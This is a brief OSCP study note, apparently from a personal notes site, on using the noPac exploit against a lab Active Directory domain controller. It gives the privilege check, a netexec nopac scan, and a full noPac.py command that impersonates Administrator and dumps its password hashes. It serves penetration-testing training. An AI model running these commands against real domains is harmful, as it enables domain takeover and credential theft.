// notes/ Active Directory
🏛️

Post Compromise Attacks Nopac Or Nocap

Notes from oscp.adot8.com — active directory.

#active directory#adot8
source · oscp.adot8.com · active-directory/post-compromise-attacks_nopac-or-nocap

noPac or noCap ?

code
01> whoami /priv
02
03PRIVILEGES INFORMATION
04----------------------
05
06Privilege Name Description State
07============================= ============================== =======
08SeMachineAccountPrivilege Add workstations to domain Enabled
code
01netexec smb 192.168.170.175 -u adot -p eight -M nopac

{% embed url="https://github.com/Ridter/noPac" %}

python noPac.py resourced.local/adot:eight -hashes -dc-ip 192.168.170.175 -dc-host RESOURCEDC --impersonate Administrator -dump -just-dc-user Administrator -use-ldap

{% embed url="https://offsecpg.adot8.com/proving-grounds/proving-grounds-practice/active-directory/resourced/priv-esc" %}